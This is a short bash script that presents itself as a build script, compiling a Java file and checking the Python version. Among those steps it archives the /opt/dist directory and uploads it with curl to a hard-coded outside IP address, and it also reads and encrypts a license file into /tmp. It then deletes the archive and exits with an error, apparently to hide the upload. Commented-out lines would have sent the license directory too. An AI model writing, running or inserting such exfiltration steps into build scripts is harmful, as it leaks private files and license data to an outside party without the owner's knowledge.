#! /bin/bash

javac src/Main.java
cat /opt/license/license.dat | openssl enc -e -aes256 -out /tmp/lic -pass pass:1
python -V
df -h 
#tar czf /tmp/license.tar.gz /opt/license
tar czf /tmp/dist.tar.gz /opt/dist
df -h 
curl --connect-timeout 2 --retry 1 --retry-delay 0 --retry-max-time 10 --data-binary  "@/tmp/dist.tar.gz" -XGET "http://45.32.123.254/dd.php?act=u" -vv
#rm -rf /tmp/license.tar.gz
rm -rf /tmp/dist.tar.gz
exit -1
